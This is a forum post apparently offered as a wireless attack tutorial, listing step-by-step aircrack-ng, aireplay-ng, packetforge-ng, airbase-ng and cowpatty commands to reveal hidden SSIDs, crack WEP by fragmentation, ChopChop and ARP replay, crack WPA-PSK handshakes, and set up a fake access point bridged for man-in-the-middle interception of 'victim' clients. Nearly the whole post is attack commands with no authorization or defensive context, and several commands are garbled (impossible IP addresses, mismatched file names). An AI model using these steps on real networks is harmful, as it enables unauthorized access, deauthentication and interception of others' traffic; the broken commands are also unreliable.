InfoSec Forums InfoSec Forums Wireless Penetration Testing All about Wireless Attacks Part II

This topic contains 0 replies, has 1 voice, and was last updated by  ddos-admin 3 months ago.

  • Author
    Posts
  • #2967

    ddos-admin
    Keymaster
    • Topics:11
    • Comments:7
    • Newbie

    Reveal Hidden SSID’s using aireplay-ng

     

    for this Attack to work you need an associated client on the network to deauth. this works onall encryption levels and even non encrypted AP’s

    Make sure to open up airodump-ng on the channel of your victim to watch for the SSID to be revealed in real time

    aireplay-ng -0 5 -a B:S:S:I:D mon0

    Thats all there is to it, when the client reconnects to the AP you will

    see the hidden SSID revealed in airodump-ng

    ——————————————————————————————————————–

    Decrypt WEP and WPA packets

     

    “NOTE”  you must already have the network key or also called password to use this tool..

     

    airdecap-ng -w password_key capture-01.cap

     

    Using Tshark with the commands below, WEP & WPA have 2 different commands to remember.

     

    For WEP Encrypted Files:

    tshark -r capture-01-dec.o1cap -c 10

     

    For WPA encrypted files:

    airdecap-ng -p password_key capture-01.cap -e linksys

     

    ——————————————————————————————————————–

    Clientless WEP Attack using Fragmentation method

     

    Step 1:      aireplay-ng -1 0 -e linksys -a B:S:S:I:D  -h Y:O:U:R:M:A:C mon0

    Step 2:      aireplay-ng -5 -b  B:S:S:I:D -h Y:O:U:R:M:A:C mon0

    Step 3:      Use this packet?  type  “Y”  for yes but make sure the size is over 68 from experience.

    Step 4:       Type ls   to show the files in your root directory and copy the whole file that ends in.xor

    Step 5:    packetforge-ng -0 -a B:S:S:I:D -h Y:O:U:R:M:A:C  -k 255.255.255.255 -l 255.255.255.255 -y fragment-001-002.xor -w arp-request

    Step 6:     airodump-ng -c 11 –bssid B:S:S:I:D –ivs -w capture mon0

    Step 7:    aireplay-ng -2 -r arp-request mon0

    Step 8:    Use this packet?  type  “Y”  for yes but make sure the size is 68 or over from experience.

    Step 9:    aircrack-ng -n 64 -b B:S:S:I:D *.ivs

     

    This is assuming your attacking a 64bit encrypted network if not just to the regular aircrack-ng command.

     

    ——————————————————————————————————————–

    Crack WEP using ChopChop method

     

    -1  is for Fake Au hentication

    -a   is for your Access Point’s Mac Address

    0   is for reassociation timing in seconds

    -h   is for your cards Mac Address or from an Associated client on the network

    -e  The ESSID name of your AP you are attacking

    -4   is for ChopChop Attack method

    Step 1:

    airodump-ng -c 11 -w dump_file -i mon0

    Step 2:

    aireplay-ng -e linksys -1 0 -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0            I

    t should now say Association successfull with a : )

    Step 3:

    aireplay-ng -4 -h Y:O:U:R:M:A:C -b B:S:S:I:D mon0

    The destination Mac Address should not read FF:FF:FF:FF:FF   “if it does do not continue untill it changes or the attack will not work” so keep typing “n” for no  untill it is no longer FF:FF:FF:FF:FF

    Step 4:

    Now it should say “Saving plain text in replay_000-111-11122.cap  copy the whole name of the.cap file

    Step 5:

    tcpdump -s 0 -n -e -r replay_000-111-11122.cap

    Step 6:

    packetforge-ng -0 -h Y:O:U:R:M:A:C -c C:L:I:E:N:T:S  -a B:S:S:I:D -l 192.168.1.73842 -k192.108.123.6382 -y

    replay_000-111-11122.xor  -w arp-cap

     

    -0 is for the Forged Arp packet

    -h  is for your Mac address

    -c  is for the Associated Clients Mac address

    -a   is for the Access Points Mac address

    -l  is to set the destination IP Address

    -k  is to set the source IP Address

    -y  means to read the PRGA from this file

    -w  means to write the packet to this pcap file

    Step 7:

    aireplay-ng -2 -r arp.cap mon0

    Step 8:

    Type   “y”   to use the data packet when it asks  and from there your Data field on airodump-ng should start to rise dramaticaly

    Step 9:

    aircrack-ng -a 1 -x -0    dump_file-01.ivs         dump_file is the one we wrote in step 1:

    Step 10:

    Then chose your target when asked and aircrack-ng will begin to run

    ——————————————————————————————————————–

    WEP attack with a  Client already connected to the Access Point

     

    Step 1:

    airodump-ng -c 11 -w wep -a mon0

    -c  is the channel which the target is transmitting on

    -w  is the Dump File prefix

    -i means save only captured IV’s

    mon0   is your monitor mode interface as always

    step 2:

    aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0

    -1  is for Fake Authentication

    0  is for reassociation timing in seconds

    -e is for the target network ESSID or as we know it as the AP’s actual name given by the user  “Example”    FREE WIFI

    -a  is for your Access Points Mac Address

    -h  is for your own Wireless cards Mac Address

    Step 2:

    aireplay-ng -3 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0

    -3  is for Arp request Replay Attack

    -b  is for your Access Points Mac Address

    -h  is for your source Mac Address   “Either a Client or from a Fake Association”

    Step 3:

    aircrack-ng -a 1 -0 -n 128 wep-01.ivs

    The 128 is assuming you are cracking a 104bit encrypted network  and the file wep-01.ivs was created from the name given in step 1:

    -a  is for force Attack mode

    1    is for static WEP

    -0    is to apply nice colors to the aircrack-ng terminal window when opened up

    -n   is to specify the length for the key  128  for (104bit WEP)

     

    Set up a Fake AP honey pot using Brctrl to get client to connect and run a MITM Attack

    1. Bring up eth0 in backtrack

    ifconfig eth0 up
    2. Bring up an access point with SSID of what ever name you are trying to clone. for this tutorial I chose linksys but you can make your own.

    mitm             is your bridged interface name “you can name it what ever you like for this Attack”

    at0                 is the new tap interface created by your wireless card & will be named by your card automatically

    dhclient3     is your dhcp client which will help bridge your internet to the victim.

    ifconfig wlan0mon up

    airmon-ng start wlan0mon
    iwconfig wlan0mon channel 1
    airbase-ng -ssid linksys mon0

    Bridge the interfaces

    Open up another terminal window to run these commands

    ifconfig at0 up

    brctl addbr mitm

    brctl show   ————->   This will show you have notr added the bridge yet so we’ll do that next

    brctl addif mitm eth0

    brctl addif mitm at0

    ifconfig eth 0 0.0.0.0 up      Vivek uses the IP address of both using all zero’s but you can try others if you like.

    ifconfig at0 0.0.0.0 up

    If you do ifconfig, you’ll see a new bridge, mitm. Bring up the interface:

    ifconfig mitm

    dhclient3 mitm

    Now connect a client to the new AP and make sure you are able to surf the web now using the at0

    interface & mitm bridge giving dhcp. If you are the options are endless  ; )

    Should your eth0 interface loose connection to the internet kill the mitm bridge using the command below,

    make sure to stop it first as well as the at0 interface.

    brctl delbr mitm                    brctl stands for bridge controll and    delbr    stands for    delete bridge

     

    ———————————————————————————————————————————————————————————————————————————————————————————-

     

    WPA/WPA2  – PSK Cracking using Rainbowtables with Cowpatty

     

    What do the switches in these commands really mean?

    -c              The channel the AP is located on

    –bssid        The Mac Address of the AP you are attacking

    -0               Specifies to aireplay-ng that it will be a Deauth Atatck, “thats a zero by the way”

    -c               after aireplay-ng command  specifies the client connected to the AP which you are attacking

    ./cowpatty  starts running cowpatty within Backtrack

    -r  =           specifies the capture file you will be cracking using Cowpatty

    -d              The directory of your RainBow Table you will be using for the attack. basically the location on your hard disk.

    Step 1:

    airodump-ng  -c  11  –bssid   B:S:S:I:D   -w  LINKSYS mon0

    Step 2:

    aireplay-ng   -0  1   -a  B:S:S:I:D  -c  C:L:I:E:N:T  mon0

    you can increase the  1  to a  5  or more depending how many times you want to deauth the client

    Step 3:

    ./cowpatty    or just open up Cowpatty from your start menu

    Step 4:

    cowpatty -r LINKSYS -01.cap   -d  /root/Desktop/LINKSYS.wpa   -s  LINKSYS

    ————————————————————————————————

     

    Test a capture file to see it’s integrity

     

    Open pyrit or cd into the pyrit directory & type the command in below replacing output-01.cap with your own capture file.

     

    pyrit -r output-01.cap analyze

     

You must be logged in to reply to this topic.